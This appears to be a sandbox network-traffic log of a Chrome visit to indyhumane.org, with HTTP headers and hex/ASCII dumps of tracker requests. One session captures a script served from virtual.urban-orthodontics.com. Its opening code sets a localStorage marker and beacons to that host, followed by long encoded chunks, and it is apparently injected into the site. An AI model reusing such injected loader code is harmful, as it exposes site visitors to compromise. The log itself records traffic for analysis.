                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Origin: https://indyhumane.org
                                                                                                                                                                                                                                                        X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                        Referer: https://indyhumane.org/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        Cookie: test_cookie=CheckForPermission
                                                                                                                                                                                                                                                        2025-01-09 01:59:20 UTC845INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: https://indyhumane.org
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:19 GMT
                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                        Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                        Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                        Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                        Content-Type: text/plain
                                                                                                                                                                                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                        Content-Security-Policy-Report-Only: script-src 'none'; form-action 'none'; frame-src 'none'; report-uri https://csp.withgoogle.com/csp/scaffolding/ascnsrsggc:111:0
                                                                                                                                                                                                                                                        Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to=coop_reporting
                                                                                                                                                                                                                                                        Report-To: {"group":"coop_reporting","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/scaffolding/ascnsrsggc:111:0"}],}
                                                                                                                                                                                                                                                        Server: Golfe2
                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                        Connection: close


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        140192.168.2.449924142.250.181.2264432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:19 UTC1030OUTGET /td/ga/rul?tid=G-RSYQJ6KTLL&gacid=932040568.1736387953&gtm=45je5170v9134491864za200&dma=0&gcd=13l3l3l3l2l1&npa=0&pscdl=noapi&aip=1&fledge=1&frm=0&tag_exp=101925629~102067555~102067808~102081485~102198178&z=668126290 HTTP/1.1
                                                                                                                                                                                                                                                        Host: td.doubleclick.net
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                        X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: iframe
                                                                                                                                                                                                                                                        Referer: https://indyhumane.org/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        Cookie: test_cookie=CheckForPermission
                                                                                                                                                                                                                                                        2025-01-09 01:59:20 UTC954INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        P3P: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
                                                                                                                                                                                                                                                        Timing-Allow-Origin: *
                                                                                                                                                                                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:20 GMT
                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                        Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                        Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                        Server: cafe
                                                                                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                                                                                        Set-Cookie: test_cookie=; domain=.doubleclick.net; path=/; expires=Fri, 01-Aug-2008 22:45:55 GMT; SameSite=none; Secure
                                                                                                                                                                                                                                                        Set-Cookie: IDE=AHWqTUmgi_KaV_vmCIXRWAviJHfF6XtRvGpgrnd-sNzLOh9Yn-8cB-EiNAq9VlvF; expires=Sat, 09-Jan-2027 01:59:20 GMT; path=/; domain=.doubleclick.net; Secure; HttpOnly; SameSite=none
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                        2025-01-09 01:59:20 UTC18INData Raw: 64 0d 0a 3c 68 74 6d 6c 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                        Data Ascii: d<html></html>
                                                                                                                                                                                                                                                        2025-01-09 01:59:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        141192.168.2.44992652.49.239.2264432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:19 UTC708OUTGET /qmap?c=1389&tp=STSC&tpid=8b05cf9f-7156-4e8e-80d8-30a255c1b07a-677f2d75-5553&gdpr=0&gdpr_consent=&ct=y HTTP/1.1
                                                                                                                                                                                                                                                        Host: sync.crwdcntrl.net
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                        Referer: https://pixel-sync.sitescout.com/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        Cookie: _cc_cc=ctst
                                                                                                                                                                                                                                                        2025-01-09 01:59:20 UTC910INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:20 GMT
                                                                                                                                                                                                                                                        Content-Type: image/gif
                                                                                                                                                                                                                                                        Content-Length: 49
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                        Expires: 0
                                                                                                                                                                                                                                                        X-Server: 10.45.26.161
                                                                                                                                                                                                                                                        Set-Cookie: _cc_dc=1;Path=/;Domain=crwdcntrl.net;Expires=Mon, 06-Oct-2025 01:10:00 GMT;SameSite=None;Secure
                                                                                                                                                                                                                                                        Set-Cookie: _cc_id=b8425e6f88cd7ce9278ed5f3930daaad;Path=/;Domain=crwdcntrl.net;Expires=Mon, 06-Oct-2025 01:10:00 GMT;SameSite=None;Secure
                                                                                                                                                                                                                                                        Set-Cookie: _cc_cc="ACZ4nGNQSLIwMTJNNUuzsEhOMU9OtTQyt0hNMU0ztjQ2SElMTExhAIL0et0KBgQAAGOfCxA%3D";Version=1;Path=/;Domain=crwdcntrl.net;Expires=Mon, 06-Oct-2025 01:10:00 GMT;Max-Age=23328000;SameSite=None;Secure
                                                                                                                                                                                                                                                        Set-Cookie: _cc_aud="ABR4nGNgYGBIr9etYIADABNrAYw%3D";Version=1;Path=/;Domain=crwdcntrl.net;Expires=Mon, 06-Oct-2025 01:10:00 GMT;Max-Age=23328000;SameSite=None;Secure
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        2025-01-09 01:59:20 UTC49INData Raw: 47 49 46 38 39 61 01 00 01 00 91 ff 00 ff ff ff 00 00 00 c0 c0 c0 00 00 00 21 f9 04 01 00 00 02 00 2c 00 00 00 00 01 00 01 00 00 02 02 54 01 00 3b
                                                                                                                                                                                                                                                        Data Ascii: GIF89a!,T;


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        142192.168.2.44992734.111.113.624432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:20 UTC546OUTGET /idsync/ex/receive/check?partner_id=2499&partner_device_id=8b05cf9f-7156-4e8e-80d8-30a255c1b07a-677f2d75-5553 HTTP/1.1
                                                                                                                                                                                                                                                        Host: pixel.tapad.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        Cookie: TapAd_TS=1736387958854; TapAd_DID=dcf9376c-b388-4443-970c-4d2581bbbe3d; TapAd_3WAY_SYNCS=
                                                                                                                                                                                                                                                        2025-01-09 01:59:20 UTC1095INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:20 GMT
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA
                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Mobile
                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                        P3P: policyref="http://tapad-taptags.s3.amazonaws.com/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
                                                                                                                                                                                                                                                        Set-Cookie: TapAd_TS=1736387958854;Expires=Mon, 10 Mar 2025 01:59:20 GMT;Path=/;Domain=.tapad.com;Secure;SameSite=None
                                                                                                                                                                                                                                                        Set-Cookie: TapAd_DID=dcf9376c-b388-4443-970c-4d2581bbbe3d;Expires=Mon, 10 Mar 2025 01:59:20 GMT;Path=/;Domain=.tapad.com;Secure;SameSite=None
                                                                                                                                                                                                                                                        Set-Cookie: TapAd_3WAY_SYNCS=;Expires=Mon, 10 Mar 2025 01:59:20 GMT;Path=/;Domain=.tapad.com;Secure;SameSite=None
                                                                                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                                                                                        Content-Length: 95
                                                                                                                                                                                                                                                        Server: Jetty(11.0.13)
                                                                                                                                                                                                                                                        Via: 1.1 google
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        2025-01-09 01:59:20 UTC95INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 03 50 4c 54 45 00 00 00 a7 7a 3d da 00 00 00 01 74 52 4e 53 00 40 e6 d8 66 00 00 00 0a 49 44 41 54 08 d7 63 60 00 00 00 02 00 01 e2 21 bc 33 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                                                                                        Data Ascii: PNGIHDR%VPLTEz=tRNS@fIDATc`!3IENDB`


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        143192.168.2.449876185.76.79.504432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:20 UTC604OUTGET /w1EdyrhzfqOncyf49WIx6LAleLrhaz+rrTBxs7k0QqyzczHosXMn6Kk3b7OhM2e5qCRnsrsiP7c= HTTP/1.1
                                                                                                                                                                                                                                                        Host: virtual.urban-orthodontics.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                        Referer: https://indyhumane.org/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:21 UTC181INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:21 GMT
                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                        2025-01-09 01:59:21 UTC3950INData Raw: 66 36 37 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 6c 53 74 6f 72 61 67 65 5b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 5d 3d 31 3b 76 61 72 20 64 6f 6d 61 69 6e 3d 27 68 74 74 70 73 3a 2f 2f 76 69 72 74 75 61 6c 2e 75 72 62 61 6e 2d 6f 72 74 68 6f 64 6f 6e 74 69 63 73 2e 63 6f 6d 2f 27 3b 66 75 6e 63 74 69 6f 6e 20 73 65 6e 64 53 74 61 74 69 73 74 69 63 73 28 74 79 70 65 29 7b 76 61 72 20 69 3d 6e 65 77 20 49 6d 61 67 65 28 29 3b 69 2e 73 72 63 3d 64 6f 6d 61 69 6e 2b 74 79 70 65 3b 7d 76 61 72 20 65 6c 65 6d 73 3d 5b 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2c 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2c 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 5d 3b 76 61 72 20 61
                                                                                                                                                                                                                                                        Data Ascii: f67(function(){window.localStorage[window.location.hostname]=1;var domain='https://virtual.urban-orthodontics.com/';function sendStatistics(type){var i=new Image();i.src=domain+type;}var elems=[document.documentElement,document.head,document.body];var a
                                                                                                                                                                                                                                                        2025-01-09 01:59:21 UTC4104INData Raw: 31 30 30 30 0d 0a 4e 74 74 33 4e 33 75 39 31 77 33 4b 4e 72 38 6c 36 72 74 33 5a 6f 53 64 32 71 39 76 4f 48 43 44 70 39 75 68 62 6d 44 2f 68 61 32 2f 59 31 59 57 35 75 68 76 69 79 4d 6a 69 32 73 71 34 74 43 66 59 35 76 4a 73 77 32 6e 64 70 69 61 48 74 6e 50 70 7a 47 53 37 34 37 6c 42 68 4c 75 55 74 69 76 34 32 31 46 38 71 74 5a 34 70 39 52 6d 74 6d 62 57 6e 43 6a 74 7a 41 33 70 30 74 4f 36 6d 79 7a 35 32 6b 50 68 55 6b 48 39 32 6a 65 54 5a 56 4a 70 71 57 44 78 77 78 46 76 71 44 52 59 72 45 48 79 37 64 52 5a 63 6a 44 67 53 53 6e 68 53 43 50 68 51 30 50 68 76 56 77 69 63 4b 37 76 36 74 48 41 53 45 74 75 6e 6a 74 79 58 79 79 4a 56 79 33 58 78 52 54 46 50 6b 41 63 59 35 2b 6d 52 69 76 70 75 68 61 46 7a 6f 4b 42 79 33 39 53 6e 30 44 31 31 31 44 48 4a 43 4b 31
                                                                                                                                                                                                                                                        Data Ascii: 1000Ntt3N3u91w3KNr8l6rt3ZoSd2q9vOHCDp9uhbmD/ha2/Y1YW5uhviyMji2sq4tCfY5vJsw2ndpiaHtnPpzGS747lBhLuUtiv421F8qtZ4p9RmtmbWnCjtzA3p0tO6myz52kPhUkH92jeTZVJpqWDxwxFvqDRYrEHy7dRZcjDgSSnhSCPhQ0PhvVwicK7v6tHASEtunjtyXyyJVy3XxRTFPkAcY5+mRivpuhaFzoKBy39Sn0D111DHJCK1
                                                                                                                                                                                                                                                        2025-01-09 01:59:21 UTC4104INData Raw: 31 30 30 30 0d 0a 72 43 63 57 37 64 75 70 55 35 63 76 79 6c 76 2f 7a 79 43 2f 35 71 58 44 44 36 51 62 79 6f 76 66 71 6a 57 50 44 4e 4d 67 76 33 35 62 75 38 72 39 75 59 4a 4e 69 61 33 42 58 4f 54 33 59 77 79 33 51 30 7a 33 65 79 4c 46 70 6f 57 52 70 30 67 4f 5a 62 33 4e 44 6a 70 38 49 33 54 77 69 48 48 51 4e 67 35 54 64 50 6e 34 39 51 2f 6c 5a 38 63 7a 43 46 77 56 63 67 53 34 65 74 5a 42 6d 2f 73 5a 78 32 4a 6d 32 42 50 4d 74 4b 30 58 4b 4e 30 72 66 77 30 54 35 36 39 41 67 55 62 75 45 58 47 43 6f 6f 4b 46 43 50 2b 4f 6e 54 70 2f 46 4b 58 6c 34 65 79 4f 44 62 44 6f 6a 68 54 67 35 39 66 58 33 4d 67 41 4d 48 44 75 41 56 42 44 5a 73 6a 58 6d 52 77 51 69 6e 6e 52 72 56 71 31 65 76 77 50 30 57 74 62 70 77 34 51 4a 4f 4e 51 5a 72 33 47 4e 6a 59 32 4e 67 59 43 44
                                                                                                                                                                                                                                                        Data Ascii: 1000rCcW7dupU5cvylv/zyC/5qXDD6QbyovfqjWPDNMgv35bu8r9uYJNia3BXOT3Ywy3Q0z3eyLFpoWRp0gOZb3NDjp8I3TwiHHQNg5TdPn49Q/lZ8czCFwVcgS4etZBm/sZx2Jm2BPMtK0XKN0rfw0T569AgUbuEXGCooKFCP+OnTp/FKXl4eyODbDojhTg59fX3MgAMHDuAVBDZsjXmRwQinnRrVq1evwP0Wtbpw4QJONQZr3GNjY2NgYCD
                                                                                                                                                                                                                                                        2025-01-09 01:59:21 UTC4104INData Raw: 31 30 30 30 0d 0a 65 42 49 6d 39 74 2b 59 62 66 50 64 39 49 4b 59 59 6f 49 69 4c 39 49 71 36 67 46 47 73 66 42 49 50 79 63 5a 49 4e 4d 33 79 7a 51 37 6a 42 53 52 2b 44 59 78 37 76 48 58 4a 37 64 4a 38 75 46 47 72 48 64 31 2f 42 4b 6b 70 47 2f 69 64 38 6f 6b 6c 41 48 4a 49 70 35 4f 73 65 42 4d 2b 4a 58 4d 4c 4c 4e 4e 63 30 33 7a 54 69 34 59 73 4e 54 2f 6e 4f 43 76 46 2b 37 34 69 37 57 62 43 72 6e 4c 64 51 61 4d 32 58 6e 2f 51 57 72 71 57 47 79 50 2b 42 54 36 52 58 78 4c 6d 78 66 46 64 47 44 4b 70 2b 77 46 65 39 75 53 6d 4b 77 65 6c 46 37 35 33 30 6d 58 58 4d 63 31 61 41 71 44 4b 44 4c 68 52 71 77 58 66 66 69 32 2b 55 7a 39 67 54 45 55 30 71 34 73 7a 71 38 36 50 49 4c 38 62 4a 74 30 48 45 73 4a 47 43 68 2f 6e 4d 43 76 47 61 46 65 53 2b 50 6c 4a 45 46 62 6d
                                                                                                                                                                                                                                                        Data Ascii: 1000eBIm9t+YbfPd9IKYYoIiL9Iq6gFGsfBIPycZINM3yzQ7jBSR+DYx7vHXJ7dJ8uFGrHd1/BKkpG/id8oklAHJIp5OseBM+JXMLLNNc03zTi4YsNT/nOCvF+74i7WbCrnLdQaM2Xn/QWrqWGyP+BT6RXxLmxfFdGDKp+wFe9uSmKwelF7530mXXMc1aAqDKDLhRqwXffi2+Uz9gTEU0q4szq86PIL8bJt0HEsJGCh/nMCvGaFeS+PlJEFbm
                                                                                                                                                                                                                                                        2025-01-09 01:59:21 UTC4104INData Raw: 31 30 30 30 0d 0a 39 76 48 45 6e 35 38 75 76 68 48 65 4e 4d 6d 44 37 65 75 4a 49 78 4f 75 58 51 48 2b 38 64 34 30 79 59 61 79 66 37 78 50 45 31 30 70 79 61 37 64 4e 59 4d 42 37 6f 37 48 30 55 79 59 57 66 69 48 34 6f 2f 50 31 31 38 49 37 78 71 64 52 68 58 38 51 2f 46 44 35 2b 75 76 5a 75 38 61 61 6a 53 66 69 49 34 6f 66 50 31 7a 37 4e 33 6a 54 4a 68 58 38 52 50 46 44 35 39 75 66 5a 75 38 61 5a 52 70 56 2f 45 54 78 51 2b 66 62 6e 32 62 76 47 6d 54 53 72 2b 49 72 69 68 38 2b 33 48 73 33 65 4e 4e 53 63 42 2b 38 58 78 51 70 2f 2b 64 75 50 5a 75 38 61 5a 4d 50 74 2f 68 33 71 4e 33 71 65 34 4f 37 6d 70 58 6b 68 6c 75 37 33 54 4c 4f 34 75 4a 54 74 64 4a 4c 41 78 37 6e 48 75 6b 71 71 58 51 6f 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49
                                                                                                                                                                                                                                                        Data Ascii: 10009vHEn58uvhHeNMmD7euJIxOuXQH+8d40yYayf7xPE10pya7dNYMB7o7H0UyYWfiH4o/P118I7xqdRhX8Q/FD5+uvZu8aajSfiI4ofP1z7N3jTJhX8RPFD59ufZu8aZRpV/ETxQ+fbn2bvGmTSr+Irih8+3Hs3eNNScB+8XxQp/+duPZu8aZMPt/h3qN3qe4O7mpXkhlu73TLO4uJTtdJLAx7nHukqqXQoCAgICAgICAgICAgICAgICAgI
                                                                                                                                                                                                                                                        2025-01-09 01:59:21 UTC4104INData Raw: 31 30 30 30 0d 0a 4d 54 53 71 43 65 66 55 49 49 5a 51 32 54 54 35 41 78 31 41 4f 71 43 54 56 31 4b 69 68 50 6a 51 59 30 32 74 74 5a 46 4c 49 33 54 58 45 41 4e 4d 52 70 55 47 75 58 4d 48 55 72 51 6a 4d 67 6d 4f 72 32 5a 65 57 52 36 64 4d 38 67 6a 48 4a 6c 71 43 4b 31 36 31 4f 64 42 52 75 74 57 42 6d 5a 43 4c 47 51 53 53 4f 79 74 61 51 30 56 4f 58 4e 79 6e 76 49 4b 54 36 6d 59 70 6e 78 6e 54 69 30 55 71 78 7a 67 61 59 4d 44 6e 5a 38 6f 4e 4d 75 5a 42 62 4a 71 68 5a 4f 32 4d 57 4c 5a 57 39 71 47 53 53 4d 7a 46 6f 5a 6c 72 6e 72 54 6e 35 45 43 32 31 71 33 6b 67 59 2b 54 54 70 41 38 35 75 30 44 57 6b 68 70 42 49 41 78 70 57 71 43 61 44 55 49 35 34 35 6e 51 36 65 34 35 47 6b 74 72 51 41 45 4d 7a 41 4f 32 6e 48 6b 6f 45 45 4c 64 61 74 32 79 54 4e 6d 30 39 34 37
                                                                                                                                                                                                                                                        Data Ascii: 1000MTSqCefUIIZQ2TT5Ax1AOqCTV1KihPjQY02ttZFLI3TXEANMRpUGuXMHUrQjMgmOr2ZeWR6dM8gjHJlqCK161OdBRutWBmZCLGQSSOytaQ0VOXNynvIKT6mYpnxnTi0UqxzgaYMDnZ8oNMuZBbJqhZO2MWLZW9qGSSMzFoZlrnrTn5EC21q3kgY+TTpA85u0DWkhpBIAxpWqCaDUI545nQ6e45GktrQAEMzAO2nHkoEELdat2yTNm0947
                                                                                                                                                                                                                                                        2025-01-09 01:59:21 UTC4104INData Raw: 31 30 30 30 0d 0a 41 79 57 72 5a 4d 7a 32 73 47 77 46 39 52 6a 52 65 6c 48 34 62 78 5a 6a 6a 57 66 6d 34 39 56 2b 6d 48 52 78 63 4f 39 33 77 34 6c 7a 70 47 67 69 68 4a 6e 63 63 46 45 66 68 50 45 6a 2f 57 33 7a 6c 54 58 75 39 34 57 4e 34 62 62 6b 74 6b 77 64 4b 36 6d 30 68 37 33 55 38 4b 74 2b 70 38 66 30 7a 38 35 58 31 58 37 78 38 6b 63 6e 44 76 63 70 7a 6e 5a 50 4f 58 4e 70 51 74 7a 4f 70 55 64 46 56 65 50 78 6d 78 36 5a 2b 63 6b 32 76 33 6a 35 4c 59 74 78 64 32 62 52 6a 68 62 75 6d 47 62 6e 63 53 50 52 4b 6d 66 78 50 6a 54 7a 72 50 2f 41 4e 55 71 2b 35 75 52 31 6a 35 49 4a 64 30 64 32 32 50 44 6e 6d 63 31 38 73 4e 49 46 52 7a 55 4a 54 39 50 34 33 53 73 2f 4e 4d 62 32 35 33 6a 35 49 6e 61 44 75 62 62 6a 4a 62 57 64 32 30 62 51 37 74 78 68 33 6c 54 39 4a
                                                                                                                                                                                                                                                        Data Ascii: 1000AyWrZMz2sGwF9RjRelH4bxZjjWfm49V+mHRxcO93w4lzpGgihJnccFEfhPEj/W3zlTXu94WN4bbktkwdK6m0h73U8Kt+p8f0z85X1X7x8kcnDvcpznZPOXNpQtzOpUdFVePxmx6Z+ck2v3j5LYtxd2bRjhbumGbncSPRKmfxPjTzrP/ANUq+5uR1j5IJd0d22PDnmc18sNIFRzUJT9P43Ss/NMb253j5InaDubbjJbWd20bQ7txh3lT9J
                                                                                                                                                                                                                                                        2025-01-09 01:59:21 UTC4104INData Raw: 31 30 30 30 0d 0a 49 50 58 34 37 4f 5a 62 62 4f 78 45 32 69 59 6a 71 34 64 2f 65 74 46 5a 69 65 65 48 72 33 47 66 68 64 76 48 76 42 76 63 7a 58 64 47 6a 62 4f 59 37 52 6b 4c 6f 77 35 6f 6b 44 6f 79 34 67 67 45 34 2b 56 67 74 76 4d 70 75 54 75 63 49 7a 58 44 78 36 52 47 48 67 32 38 75 68 36 74 6f 45 78 67 31 61 32 6b 73 35 33 31 49 62 4c 48 32 62 6a 79 4f 49 63 4e 75 48 4d 73 59 7a 6e 45 78 68 61 30 54 48 4a 6a 61 44 72 31 72 70 72 70 47 75 74 37 61 39 68 65 34 56 62 63 56 42 42 35 4f 73 30 34 64 39 64 65 7a 76 65 33 50 47 75 70 68 61 6c 37 78 6a 4c 30 36 77 34 79 62 76 67 52 32 31 35 42 4a 70 38 6a 52 6c 79 75 4f 61 4d 55 48 49 37 61 76 5a 32 66 7a 46 4d 63 61 34 65 54 75 66 6a 62 5a 7a 6e 4c 71 4c 4c 65 54 54 39 53 67 45 39 6e 4f 79 56 68 32 30 49 71 4f
